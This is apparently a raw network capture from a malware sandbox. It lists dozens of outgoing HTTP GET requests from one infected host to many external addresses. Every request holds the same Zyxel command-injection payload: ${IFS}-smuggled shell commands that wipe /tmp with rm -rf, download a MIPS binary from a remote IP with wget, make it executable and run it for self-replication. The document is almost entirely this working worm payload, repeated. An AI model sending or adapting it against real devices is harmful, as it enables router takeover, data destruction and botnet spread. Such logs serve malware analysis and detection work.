                                        Mar 31, 2024 09:20:58.593586922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3058192.168.2.235447289.33.201.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.593627930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3059192.168.2.2346336129.149.74.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.593681097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3060192.168.2.2342960189.68.113.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.593730927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3061192.168.2.235285847.69.13.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.593771935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3062192.168.2.2351252141.135.206.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.593816996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3063192.168.2.234121274.213.9.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.593871117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3064192.168.2.235719692.226.155.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.593915939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3065192.168.2.2354600125.32.241.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.593950987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3066192.168.2.2351052188.103.25.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.593997002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3067192.168.2.23375582.225.200.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.594048023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3068192.168.2.234634237.219.223.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.594093084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3069192.168.2.2355186182.249.23.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.594149113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3070192.168.2.235757471.229.165.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.594194889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3071192.168.2.235738618.215.250.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.594242096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3072192.168.2.2360462192.129.57.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.594280958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3073192.168.2.234308454.34.127.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.594314098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3074192.168.2.235214624.126.141.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.594346046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3075192.168.2.2357648106.251.127.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.594405890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3076192.168.2.23347401.224.191.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.594436884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3077192.168.2.234038499.105.164.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.594486952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3078192.168.2.2340022131.129.203.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.594537973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3079192.168.2.234744694.240.4.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.594585896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3080192.168.2.235422220.52.96.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.594633102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3081192.168.2.2340442218.243.241.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.594683886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3082192.168.2.2356686190.66.227.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.594732046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3083192.168.2.236029057.124.162.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.594784975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3084192.168.2.235273273.66.124.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.594825983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3085192.168.2.235191675.121.169.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.594882011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3086192.168.2.233689417.29.34.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.594937086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3087192.168.2.2340712139.177.164.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.594989061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3088192.168.2.2356732193.144.30.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.595033884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3089192.168.2.234304891.27.94.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.595083952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3090192.168.2.233977212.19.122.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.595129013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3091192.168.2.234339081.143.153.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.595163107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3092192.168.2.233390269.125.130.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.595199108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3093192.168.2.234505268.77.255.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.595257044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3094192.168.2.2358492223.112.146.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.595299006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3095192.168.2.2339990110.178.194.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.595365047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3096192.168.2.2337904208.190.176.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.595396042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3097192.168.2.23377165.38.247.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.595434904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3098192.168.2.233816694.184.76.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.595484018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3099192.168.2.233554838.48.146.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.595527887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3100192.168.2.2360460156.18.180.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.595583916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3101192.168.2.2343146202.162.99.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.595633030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3102192.168.2.235011089.64.67.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.595689058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3103192.168.2.2339150209.73.241.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.595735073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3104192.168.2.234657292.136.135.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.595793009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3105192.168.2.2336606198.98.16.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.595839024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3106192.168.2.2357654201.80.78.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.595894098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3107192.168.2.235762095.180.175.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.595941067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3108192.168.2.235177498.100.48.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.595989943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3109192.168.2.2337378103.183.68.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.596048117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3110192.168.2.233607234.117.190.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.596096992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3111192.168.2.2333406200.169.32.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.596131086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3112192.168.2.2348576186.206.120.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.596196890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3113192.168.2.2337820152.64.113.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.596242905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3114192.168.2.235977672.240.151.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.596287012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3115192.168.2.234556617.225.33.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.596318960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3116192.168.2.2338202205.80.192.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.596368074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3117192.168.2.233956613.33.159.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.596412897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3118192.168.2.2352542125.114.97.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.596461058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3119192.168.2.233670453.236.59.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.596508980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3120192.168.2.236048462.151.226.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.596560001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3121192.168.2.233473644.31.26.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.596602917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3122192.168.2.236066683.250.186.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.596657038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3123192.168.2.2343016110.56.190.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.596709013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3124192.168.2.233344697.34.198.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:58.596760035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3125192.168.2.235724420.101.148.172443
                                        TimestampBytes transferredDirectionData
